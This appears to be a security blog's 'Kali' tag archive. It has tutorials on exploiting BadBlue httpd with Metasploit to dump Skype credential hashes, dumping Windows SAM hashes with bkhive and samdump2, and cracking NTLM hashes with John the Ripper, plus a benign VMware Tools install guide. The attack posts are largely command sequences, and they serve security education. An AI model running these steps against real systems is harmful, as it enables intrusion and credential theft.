Tag Archives: Kali

Post Exploitation: Dump Skype Hash with Metasploit using BadBlue httpd 2.7

The video shows how to dump Skype hashes using metasploit framework and the BadBlue httpd 2.7. Here are the steps:

  • Exploiting Windows 8 Machine using BadBlue httpd 2.7
  • Use Post Exploitation Skype module to dump the hashes
  • Crack MD5 hashes, as you will not get a plain text password(s)
nmap -sS -sV

msf> use exploit/windows/http/badblue_passthru
msf exploit(badblue_passthru) > set RHOST
msf exploit(badblue_passthru) > exploit

meterpreter > sysinfo
meterpreter > ipconfig
meterpreter > background

msf exploit(badblue_passthru) > search skype
msf exploit(badblue_passthru) > use post/windows/gather/credentials/skype

msf post(skype) > set SESSION 2
msf post(skype) > exploit

How To Install VMware Tools in Kali Linux

Kali Linux is commonly used inside of VMware Workstation, VMware Fusion, and/or VMware Player – allowing for to stretch the window freely, copy files from the host OS to the guest (Kali) and from the guest to the host. But in order for these features to work, you have to install VMware Tools. This can sometimes be a hard project for beginners.

Open up Terminal and run the command, apt-get update to make sure Kali Linux is up-to-date. After checking its databases, Kali will ask you if you want to install updates, when it does, hit Enter for yes. Do NOT close the Terminal while it’s updating, as this might ruin Kali.

When it’s done updating and you are presented with the root@kali prefix again, type: apt-get install linux-headers-$(uname –r) and hit Enter. You will be prompted if you want to install the latest headers, hit Enter for yes. Wait for it to complete before closing the command window. This step will avoid the “Kernel headers error” when installing VMware tools.

Click Install VMware Tools…/Reinstall VMware Tools… on the submenu and copy the tools file to the “root” folder. Type cd /media/cdrom and hit Enter. Type ls in the same Terminal, and hit Enter. Type cp then copy and paste the name of the VMware tools .tar.gz folder. Then add /root/ to the end. (see example below)

cp VMwareTools-9.6.2-16388356.tar.gz /root/
cd /root/
tar –xf VMwareTools-9.6.2-16388356.tar.gz
cd vmware-tools-distrib


Leave a Comment

Using bkhive and samdump2

bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

  1. ls the contents of the /WINDOWS/system32/config directory.
  2. bkhive dumps the syskey bootkey from Windows NT/2k/XP/Vista system hive.
  3. samdump2 dumps the Windows NT/2k/XP/Vista password hashes.

View Hash Contents

cd /root
ls -l *.txt
file *.txt
cat hash.txt

  1. Change directory into /root, because that is where we put our hive and hash files.
  2. List out the files using a wildcard (*).
  3. Determine the file type of the hash and hive files, where the hash file is (ASCII) and the hive file is (Compressed Binary).
  4. View the contents of the hash file


SOURCE: http://www.computersecuritystudent.com/SECURITY_TOOLS/PASSWORD_CRACKING/lesson2/

Leave a Comment

Password Cracking for noobs: All your hashes are belong to us

As the great philosopher ludacris said, “if you get hashes, you crack them. it’s a rule.” Welcome to a world where getting a hash should mean you also just owned that account. This is boring if it’s your grandmother’s computer, but way more interesting when it’s a bank. This talk will discuss the basic concepts behind password hashes, how they can be obtained, and what to do with them once you have them. Special attention will be given to demos related to effective hash cracking techniques and introduction to toolsets for making the process as efficient and effective as possible.

Bash commands for Kali:

mkdir NTLM-Project && cd NTLM-Project
wget http://www.alexrams.com/blog/wp-content/uploads/2014/09/sorted.zip
unzip sorted
wget http://www.alexrams.com/blog/wp-content/uploads/2014/09/hashes.txt
john --crack-status --rules --format=nt2 --wordlist=sorted.txt hashes.txt
cd ~/.john
cat john.pot